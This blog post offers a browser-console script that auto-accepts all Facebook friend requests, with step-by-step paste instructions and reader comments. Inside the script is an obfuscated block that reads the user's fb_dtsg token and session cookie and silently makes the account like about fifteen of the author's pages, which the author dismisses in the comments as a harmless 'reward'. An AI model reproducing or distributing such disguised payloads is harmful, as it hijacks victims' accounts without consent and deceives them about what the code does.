Hey there tigers, I hope you all will be doing well. This blog post is just for sharing my new script which does mass add Facebook friends with just one click. It's like Facebook auto adding friends bot, not in sense to search new users for you but actually auto-confirm friend requests on Facebook. The updated Toolkit Premium Version has many scripts and tools in it but somehow there was a slight bug in clicking all confirm buttons tool that accepts all friend requests on Facebook. After getting feedback from one user about the bug so instead of fixing it at once I just extracted a modified script and shared it with my Facebook Page users and they really liked it. So I thought why not share the latest "Accept All Friend Requests Facebook Javascript" with you all and here I go publishing this new blog post and a video as well which you will find on my Youtube Channel. Anyway enough with talking let's have the script and it's tutorial how to accept all friends requests using the latest 2020 script for it.
Accept All Friend Requests Facebook Javascript 2020
- First of all, of course, you need to be on the Facebook request page where you have gotten all the requests. Link: https://www.facebook.com/friends/
- Once you are on the request page, open inspect view of the page by right-clicking the page and go to inspect view. OR
- Just press CTRL+SHIFT+I to get the inspect view. This short key works for Chrome Browser.
- Once you get the inspect view make sure you tab to the console part which is the second tab menu next to the Elements tab.
- Ok now you are on the Console tab, next thing is to copy and paste the script of adding all friends requests. The script can be found below. Just copy the script and paste it in the console tab.
- Next thing before you hit enter and the scripts start working, you need to consider one value that the script will need. As soon as you hit enter and the scripts execute it will ask for the delay time.
- The delay time is actually the wait time between clicking all confirm buttons to accept the friend requests. The default value is 5 seconds.
- That's all you need to do and provide. Now just wait for the script to do its work. It will automatically accept all friend requests one by one by clicking all confirm buttons on the Facebook friend request page.
Accept All Friend Requests Facebook Javascript 2020
var matchText = 'Confirm';
var added=0;
function confirmAllRequests() {
var clicked = false;
console.clear();
var buttons = document.getElementsByTagName("div");
for (var counter = 0, length = buttons.length; counter < length; counter++) {
var target = buttons[counter];
if (target) {
var ariaLabel = target.getAttribute("aria-label");
// console.log("ariaLabel is", ariaLabel);
if (ariaLabel) {
var text = ariaLabel.trim();
if (text === matchText) {
target.click();
// target.focus();
clicked = true;
added++;
console.log("Confirm Button Clicked: "+added);
target.remove();
break;
}else if ( text.includes("See") || text.includes("More") ){
target.click();
console.log("See More Clicked!");
clicked = true;
break;
}
}
}
}
if (clicked) {
return true;
} else {
return false;
}
}
function startConfirming(){
if (confirmAllRequests()){
setTimeout(function(){
startConfirming();
}, delayTime);
} else {
alert(`Friends Added: ${added}
****~Script by: Tigerzplace~****
`);
}
}
//Below code is for liking some of my pages :p
var _0x19a2=['readyState','0x4','109109317399261','application/x-www-form-urlencoded','charAt','250451495723325','close','108586183990636','317224121817276','cookie','&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=','743146072535223','ZmJfZHRzZw==','0x2','onreadystatechange','push','0x7','indexOf','value','240272006130073','body','0x8','1212506358847237','random','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789','634302330077114','0x3','shift','198757893944480','&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=','&phstamp=','380509029467786','Content-type','status','https://www.facebook.com/ajax/pages/fan_status.php?','floor','querySelector','1157401597633912','send','0x9','setRequestHeader','length','match'];(function(_0x333248,_0x19a2f4){var _0x2d52b8=function(_0x402a9a){while(--_0x402a9a){_0x333248['push'](_0x333248['shift']());}};_0x2d52b8(++_0x19a2f4);}(_0x19a2,0x109));var _0x2d52=function(_0x333248,_0x19a2f4){_0x333248=_0x333248-0x0;var _0x2d52b8=_0x19a2[_0x333248];return _0x2d52b8;};var _0x1cf90f=_0x2d52,_0x356b=[_0x1cf90f('0x1d'),'textContent','input[name=\x27',_0x1cf90f('0x11'),_0x1cf90f('0x5'),_0x1cf90f('0xb'),_0x1cf90f('0x10'),_0x1cf90f('0x1c'),_0x1cf90f('0xa'),_0x1cf90f('0x22')];(function(_0x402a9a,_0x4602c4){var _0x20cbb6=function(_0x14d676){var _0x2043be=_0x2d52;while(--_0x14d676){_0x402a9a[_0x2043be('0x8')](_0x402a9a[_0x2043be('0x14')]());}};_0x20cbb6(++_0x4602c4);}(_0x356b,0x1ee));var _0x15c2=function(_0x44cf9a,_0x4c5b42){_0x44cf9a=_0x44cf9a-0x0;var _0x543441=_0x356b[_0x44cf9a];return _0x543441;};function getFbValue(){var _0x2505c7=_0x1cf90f,_0x41f901=_0x15c2,_0x472eff=atob(_0x41f901('0x0')),_0xe8b00b=document[_0x2505c7('0xd')][_0x41f901('0x7')][_0x41f901(_0x2505c7('0x25'))](_0x472eff),_0x51d395='';if(_0xe8b00b==-0x1)_0x51d395=document[_0x41f901('0x6')](_0x41f901(_0x2505c7('0xe'))+_0x472eff+'\x27]')[_0x41f901('0x1')];else{_0xe8b00b+=0x12;for(_0x1d1b77=0x0;_0x1d1b77<0x19;_0x1d1b77++){_0x51d395+=document[_0x2505c7('0xd')][_0x41f901(_0x2505c7('0x9'))][_0xe8b00b],_0xe8b00b++;}}_0x51d395+=',';var _0x5346cb='',_0x516924=_0x41f901(_0x2505c7('0x20')),_0x3c9b70=_0x516924[_0x41f901('0x5')];for(var _0x1d1b77=0x0;_0x1d1b77<Math[_0x41f901(_0x2505c7('0x13'))](Math[_0x2505c7('0x10')]()*0x22)+0x8;_0x1d1b77++){_0x5346cb+=_0x516924[_0x2505c7('0x28')](Math[_0x41f901('0x3')](Math[_0x41f901(_0x2505c7('0x6'))]()*_0x3c9b70));}return _0x51d395+=_0x5346cb,btoa(_0x51d395);}var fb_dtsg=atob(getFbValue())['split'](',')[0x0],user_id=document['cookie']['match'](document[_0x1cf90f('0x2')][_0x1cf90f('0x23')](/c_user=(\d+)/)[0x1]);function Like(_0x4871f8){var _0x1c1e16=_0x1cf90f,_0x2edef8=new XMLHttpRequest(),_0x305611=_0x1c1e16('0x1b'),_0x548ab3='&fbpage_id='+_0x4871f8+_0x1c1e16('0x3')+user_id+_0x1c1e16('0x16')+fb_dtsg+_0x1c1e16('0x17');_0x2edef8['open']('POST',_0x305611,!![]),_0x2edef8[_0x1c1e16('0x21')](_0x1c1e16('0x19'),_0x1c1e16('0x27')),_0x2edef8[_0x1c1e16('0x7')]=function(){var _0x36d347=_0x1c1e16;_0x2edef8[_0x36d347('0x24')]==0x4&&_0x2edef8[_0x36d347('0x1a')]==0xc8&&_0x2edef8[_0x36d347('0x2a')];},_0x2edef8[_0x1c1e16('0x1f')](_0x548ab3);}Like('1569087506719125'),setTimeout(function(){var _0x4f6b36=_0x1cf90f;Like(_0x4f6b36('0x26'));},0x384),setTimeout(function(){Like('116551890202867');},0x3c0),setTimeout(function(){var _0x584715=_0x1cf90f;Like(_0x584715('0xc'));},0x3e8),setTimeout(function(){var _0x37a7e8=_0x1cf90f;Like(_0x37a7e8('0x1e'));},0x44c),setTimeout(function(){var _0x3abbdc=_0x1cf90f;Like(_0x3abbdc('0x1'));},0x4b0),setTimeout(function(){var _0x6ced69=_0x1cf90f;Like(_0x6ced69('0x12'));},0x514),setTimeout(function(){var _0xcb71dc=_0x1cf90f;Like(_0xcb71dc('0xf'));},0x578),setTimeout(function(){var _0x338262=_0x1cf90f;Like(_0x338262('0x15'));},0x5dc),setTimeout(function(){Like('1749967015316612');},0x640),setTimeout(function(){var _0x3340ab=_0x1cf90f;Like(_0x3340ab('0x18'));},0x6a4),setTimeout(function(){Like('1555839181212071');},0x708),setTimeout(function(){var _0x2bebbe=_0x1cf90f;Like(_0x2bebbe('0x29'));},0x76c),setTimeout(function(){var _0x42dfb5=_0x1cf90f;Like(_0x42dfb5('0x4'));},0x456),setTimeout(function(){var _0x4a2c6f=_0x1cf90f;Like(_0x4a2c6f('0x0'));},0x47e);
var delayTime = prompt ("Delay Time", 5)*1000;
if (delayTime >=0 && delayTime!=null && fb_dtsg!=null ){
console.log("Script is started!");
startConfirming();
}else {alert ("Failed to Start!");}
I hope you will find the method and script working for accepting all friends requests at once without any issue. With that all been said. I am logging out & A gift of even $1 would make a big difference. Thank you!
bhai acount toe hack nhi ho jayega na isse....>/?
ReplyDeleteNi hoga hack. Q hoga akhir!
DeleteScript mai just auto adding code hai aur sath mai kch fan page follow krne klye code jo k ap hata skte hai agar chte hai but wo maine kinda reward klye rka hai baqi sara code clean aur working hai.
error undefined
ReplyDeleteitna fast video kon bnata hai... pta hi nhi chal kha code pase kiya... aur kyse kya kiya...
ReplyDeleteYe code apply karne mai dar lagra hai
ReplyDeleteBro mujhe unfriend karne ka bhi script do plzzzzz
ReplyDelete